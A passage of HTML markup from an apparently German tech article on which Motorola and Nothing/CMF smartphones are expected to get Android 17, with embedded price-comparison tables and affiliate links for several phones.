							<a class="price-comparison__view-button" href="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Galaxus" aria-label="Deal anschauen bei Galaxus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260622&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Motorola</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f02b8db"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260217_075728904.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Motorola Signature gränssnitt" class="wp-image-3062983" width="1200" height="841" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Motorola ist ein etwas schwieriger Fall. Denn obwohl alle Hersteller gleichermaßen von der EU-Regelung betroffen sind, mindestens fünf Jahre Updates zu liefern, meinte das Unternehmen lange Zeit, ein “Schlupfloch” in dieser Aussage gefunden zu haben. Daher verspricht es für einige Geräte nur vier Android-Updates.</p>



<p>Ob sich das bewahrheitet, wird sich erst noch zeigen müssen. Diese Motorola-Smartphones bekommen aber mit großer Wahrscheinlichkeit Android 17:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3068644/motorola-signature-test.html" target="_blank" rel="noreferrer noopener">Signature</a></li>



<li><a href="https://www.pcwelt.de/article/2986379/motorola-edge-70-test.html" target="_blank" rel="noreferrer noopener">Edge 70</a></li>



<li><a href="https://www.pcwelt.de/article/2839163/motorola-edge-60-test-2.html" target="_blank" rel="noreferrer noopener">Edge 60</a> / Ultra / <a href="https://www.pcwelt.de/article/2824306/motorola-edge-60-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3042698/motorola-edge-60-fusion-test.html" target="_blank" rel="noreferrer noopener">Fusion </a>/ Neo</li>



<li>Edge 50 / <a href="https://www.pcwelt.de/article/2367963/motorola-edge-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2332502/motorola-edge-50-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pro</a> / Fusion / Neo</li>



<li>Razr 60 / <a href="https://www.pcwelt.de/article/2764578/motorola-razr-60-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2447520/motorola-razr-50-im-test-faltbares-smartphone-zum-erschwinglichen-preis.html" target="_blank" rel="noreferrer noopener">Razr 50</a> / <a href="https://www.pcwelt.de/article/2603789/motorola-razr-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Neo</li>



<li>Moto G56</li>



<li><a href="https://www.pcwelt.de/article/2572797/motorola-moto-g75-test-2.html" target="_blank" rel="noreferrer noopener">Moto G75</a></li>



<li>Moto G86</li>



<li>Moto G86 Power</li>



<li>Lenovo Thinkphone 25</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Edge 40, Edge 40 Pro, Edge 40 Neo, Razr 40, Razr 40 Ultra, Razr 40 Neo, Moto G35, Moto G45, Moto G55, Moto G85, Lenovo Thinkphone.</p>



<p><strong>Motorola Edge 70 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>379,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=mQXz358ILJbgFdiMIpCMzOLmod-rlVfsUbN7aF8bFrTHe66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260622&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=mQXz358ILJbgFdiMIpCMzOLmod-rlVfsUbN7aF8bFrTHe66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="379,99 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 379,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>425,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260622&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="425,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 425,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>483,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260622&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="483,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 483,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>484,70 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260622&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="484,70 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 484,70 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>629,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260622&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="629,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 629,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260622&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Motorola</span>
													</div>
												<div class="price-comparison__price ">
						<span>799,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-price="799,99 €" data-vars-product-vendor="Motorola" aria-label="Deal anschauen bei Motorola für 799,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Nothing / CMF</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f032aa1"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Nothing-Phone-4a-Pro-7.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Nothing Phone 4a Pro 7" class="wp-image-3093077" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Der Hersteller Nothing beziehungsweise CMF geht beim Design seiner Smartphones zwar einen eigenwilligen Weg, hält sich bei der Angabe verfügbarer Android-Updates aber an ein klares Prinzip. Alle Modelle erhalten mindestens drei große Android-Updates:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3089770/nothing-phone-4a-test.html" target="_blank" rel="noreferrer noopener">Phone 4a</a></li>



<li><a href="https://www.pcwelt.de/article/3099920/nothing-phone-4a-pro-test-2.html" target="_blank" rel="noreferrer noopener">Phone 4a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2633627/nothing-phone-3a-test.html" target="_blank" rel="noreferrer noopener">Phone 3a</a></li>



<li><a href="https://www.pcwelt.de/article/2633499/nothing-phone-3a-pro-hands-on.html" target="_blank" rel="noreferrer noopener">Phone 3a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2002927/nothing-phone-2-test.html" target="_blank" rel="noreferrer noopener">Phone (2)</a></li>



<li><a href="https://www.pcwelt.de/article/2259040/nichts-telefon-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a</a></li>



<li><a href="https://www.pcwelt.de/article/2425610/nothing-phone-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a Plus</a></li>



<li><a href="https://www.pcwelt.de/article/2768762/cmf-phone-2-pro-test.html" target="_blank" rel="noreferrer noopener">CMF Phone 2 Pro</a></li>
</ul>



<p><strong>Kein Android 17 mehr:</strong> Nothing Phone (1), CMF Phone 1.</p>



<p><strong>Nothing Phone 4a im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>348,42 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=ehwcX2vQehRVf28VzW0Dp4eF8ZBoGX1q6a4MhPUQ3No1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260622&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=ehwcX2vQehRVf28VzW0Dp4eF8ZBoGX1q6a4MhPUQ3No1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="348,42 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 348,42 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Nothing</span>
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-price="349,00 €" data-vars-product-vendor="Nothing" aria-label="Deal anschauen bei Nothing für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260622&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="349,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>389,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="389,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 389,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Sony</h2>


